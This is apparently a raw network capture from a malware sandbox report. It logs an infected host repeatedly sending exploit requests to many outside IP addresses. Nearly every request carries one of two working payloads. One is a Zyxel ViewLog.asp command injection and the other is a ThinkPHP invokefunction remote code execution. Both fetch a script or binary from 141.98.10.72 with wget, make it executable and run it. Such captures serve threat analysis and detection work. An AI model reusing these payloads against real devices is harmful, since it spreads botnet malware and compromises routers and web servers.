                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1044192.168.2.154593694.123.87.1008080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:14.639802933 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1045192.168.2.1556520112.74.127.16380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:14.865359068 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:15.223227978 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:31:15 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1046192.168.2.155793431.44.132.1908080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:15.158564091 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1047192.168.2.153669094.123.49.2148080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:15.158641100 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1048192.168.2.154368031.200.92.38080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:15.158694029 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1049192.168.2.153512894.187.99.2458080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:15.158735037 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1050192.168.2.155990888.212.8.1280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:16.432631969 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:17.108361959 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:17.329647064 CET516INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Content-Length: 349
                                                      Connection: close
                                                      Date: Wed, 14 Feb 2024 08:31:16 GMT
                                                      Server: lighttpd/1.4.45
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1051192.168.2.154951288.212.252.12080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:16.444366932 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:16.677329063 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:31:16 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1052192.168.2.154239695.59.5.10280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:16.567678928 CET391INHTTP/1.1 400 Bad Request
                                                      Server: micro_httpd
                                                      Cache-Control: no-cache
                                                      Date: Wed, 14 Feb 2024 11:31:15 GMT
                                                      Content-Type: text/html
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1053192.168.2.154492285.72.47.668080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:16.711014032 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1054192.168.2.155758495.46.0.15680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:16.887660027 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:17.119755983 CET59INHTTP/1.1 400 Bad Request
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1055192.168.2.153769895.164.45.2488080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:16.904762983 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:17.101778030 CET59INHTTP/1.1 400 Bad Request
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1056192.168.2.153716295.100.190.3680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:17.689596891 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:17.915997982 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:31:17 GMT
                                                      Date: Wed, 14 Feb 2024 08:31:17 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 66 64 31 66 35 35 37 26 23 34 36 3b 31 37 30 37 38 39 39 34 37 37 26 23 34 36 3b 31 62 62 66 35 37 62 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;afd1f557&#46;1707899477&#46;1bbf57be</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1057192.168.2.154986095.100.149.4280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:17.899930954 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:18.110260963 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:31:18 GMT
                                                      Date: Wed, 14 Feb 2024 08:31:18 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 36 61 35 37 31 64 34 26 23 34 36 3b 31 37 30 37 38 39 39 34 37 38 26 23 34 36 3b 33 32 34 61 37 31 31 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;96a571d4&#46;1707899478&#46;324a7115</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1058192.168.2.153602895.214.235.22180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:17.920886993 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:18.153096914 CET450INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:31:18 GMT
                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33
                                                      Content-Length: 226
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1059192.168.2.15784088.249.41.17780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:18.393924952 CET32INData Raw: 28 52 65 66 2e 49 64 3a 20 3f 73 4b 66 76 6c 73 43 34 4d 34 61 32 57 38 50 61 43 34 7a 46 3f 29
                                                      Data Ascii: (Ref.Id: ?sKfvlsC4M4a2W8PaC4zF?)


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1060192.168.2.154234631.200.108.1808080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:19.377882957 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1061192.168.2.155962895.34.243.1438080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:19.604783058 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:20.791033983 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:22.166836023 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:25.078952074 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:30.710733891 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:41.718637943 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
